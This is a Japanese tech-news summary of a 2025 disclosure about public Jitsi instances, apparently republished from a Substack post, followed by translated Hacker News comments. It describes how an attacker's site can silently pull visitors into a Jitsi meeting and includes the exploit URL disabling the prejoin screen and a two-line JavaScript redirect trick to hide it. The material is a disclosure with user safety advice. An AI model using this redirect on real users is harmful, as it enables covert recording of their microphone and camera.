ハクソク

世界を動かす技術を、日本語で。

Jitsiのプライバシー欠陥により、ワンクリックでのステルス音声および映像キャプチャが可能に

2025年7月24日原文(zimzi.substack.com)

概要

  • Jitsi の公開インスタンスに存在する セキュリティリスク の事例紹介
  • 攻撃者 がユーザーの音声・映像を 無断取得 できる可能性
  • Jitsi運営 はこれを「機能」として認識し、修正予定なし
  • ユーザー自身によるセキュリティ対策 の重要性強調
  • 公開事例 の経緯とディスクッションの呼びかけ

Jitsi公開インスタンスにおけるセキュリティリスク

  • Jitsi はオープンソースの ウェブ会議アプリケーション
  • meet.jit.si は誰でも利用できる 公開インスタンス、月間数百万ユーザー規模
  • 攻撃者は MiniGinger という会議を公開インスタンス上に作成
  • ユーザーが攻撃者管理の CuteCats.com へアクセスすると、裏で次のURLにリダイレクト
    • https://meet.jit.si/MiniGinger#config.prejoinConfig.enabled=false
  • ユーザーが過去にJitsi会議で マイク・カメラ利用を許可 していた場合、 追加の操作なし でMiniGinger会議がバックグラウンドで実行
  • これにより、攻撃者は ユーザーの音声・映像データ無断取得 可能
  • さらに、JavaScriptを用いた ウィンドウ操作トリック でユーザーに気づかれにくくすることも可能
    • window.open(location.href)
    • location.href= ('https://meet.jit.si/MiniGinger#config.prejoinConfig.enabled=false')

Jitsi運営の対応と問題提起

  • Jitsi運営 はこの挙動を「 機能」として認識、 修正予定なし と回答
  • 特に 公開インスタンス でのリスクが高いことを指摘
  • 利用者側での 自己防衛 策の必要性
  • 少なくとも公開インスタンスでは無効化 すべきという提案

公開・ディスクロージャー経緯

  • 2025年6月17日 :Jitsiに発見内容を報告
  • 同日 :Jitsiから「 機能」との回答
  • 6月18日 :公開議論の許可を問い合わせるも回答なし
  • 7月23日 :1ヶ月以上返答なしのため本記事を 公開
  • HackerNews での議論を呼びかけ

ユーザー向けセキュリティ対策

  • Jitsi会議利用時、マイク・カメラの アクセス権限管理 の徹底
    • 利用後は ブラウザの権限設定 で都度解除推奨
  • 不審なサイト不明な会議URL へのアクセス回避
  • 公開インスタンス利用時 は特に 注意喚起
  • 公式コミュニティや セキュリティ議論 への参加推奨

まとめとディスカッションの呼びかけ

  • Jitsi公開インスタンス の設計上の問題点
  • 開発側とユーザー側 双方の意識向上の必要性
  • 本件に関する 意見・議論 をコメント欄や HackerNews で募集

Hackerたちの意見

Jitsiは使ってないけど、オープンタブの数がちょっと恥ずかしくなってきた。別の脆弱性がずっと前にこっそり仕掛けられてたかもしれないしね。

少なくともFirefoxでは、タブ録画中はファビコンに脈打つ赤いマイクが表示されるよ。気づいてると思うけど、もしかしたらタブが多すぎて見えなくなってるのかもね?

これってどんな機能に使われるのか説明してくれる人いる?自動で音声/映像に参加する理由が全然思いつかないんだけど。

フリクションを減らすためだと思うよ。一度だけ許可を与えれば、毎回Jitsiミーティングに参加するたびに許可を求められないからね。

Matrixはしばらくの間、Jitsiを音声/ビデオ通話のソリューションとして組み込んでたし、今もクライアントによってはそうかも。通話ボタンをクリックしたら自動的に通話に参加するのは、UXの観点から見ても理にかなってる。ただ、特定のコンテナ以外でそれを許可する理由は思いつかないな。統合には便利だけど、公共のインスタンスでは明らかに悪いデザインだよね。

もし他のサービスに埋め込まれていて、すでにそのサービスを通じて参加ボタンをクリックしてたら、追加の事前参加ダイアログはあまり望ましくないUXフローになると思う。例えば、仕事で使わなきゃいけないMS Teamsが、Outlookで参加ボタンをクリックするたびに事前参加ダイアログを出さずに、マイクをミュート、カメラを無効にした状態で自動的に参加してくれたら文句は言わないかな。でも、私の場合はMS Teamsを独自のブラウザウィンドウ/プロセス/プロファイルに入れてるから、セキュリティの問題にはならないんだ。Firefoxでの動作を全く考慮しないから、タブの同期やタブグループ、アカウントコンテナを逃したくないし、Chromeに似た機能を追加する拡張機能をインストールできないのが理由なんだけどね。

これって新しいって理解されてるの?かなり前にこれにやられた気がするんだけど。(パンデミック中、つまり脆弱性が多かった時期にね。)もし誰かがシグナルの情報を教えてくれたら、オフレコで話す用意はあるよ。

うん、これは新しいことじゃないし、Jitsiだけに影響してるわけでもないと思う(「正しい」ビデオ会議システムだけを見た場合)Jitsiで簡単にアーカイブできるからね。

もしかしたら僕のMacが過敏に設定されてるのかもしれないけど、マイクとカメラの許可を求められずに動画を共有できるの?僕はいつもJitsiでチャットしてて、毎回マイクとカメラの使用許可を明示的に与えなきゃいけないんだよね。

すでにJitsiを使ってるなら、もうその許可を与えてるんじゃないの?

おそらく99%の人が「はい、いつも」とクリックするよね。

でも、マイクとカメラの許可を与えずにビデオを共有できる? うん、それはブラウザの設定で「特定のサイトのマイク/カメラの許可を記憶する」ってやつだね。この「記憶する」がデフォルトでどの程度あるのかは分からないけど、システム設定やMDAなどで無効にできるはず。多分、SafariのMac版ではデフォルトじゃないかもしれないけど、あなたの安全を守るためだけじゃなくて、イライラさせてMacを使わせようとしてるのかも。Appleが人をアプリストアに誘導するためにやってる似たようなことの悲しいリストに入るね。でも、より安全なのは多くのユーザーにとってはやっぱりいいことだよね。

Hacker Newsで議論の続きを見る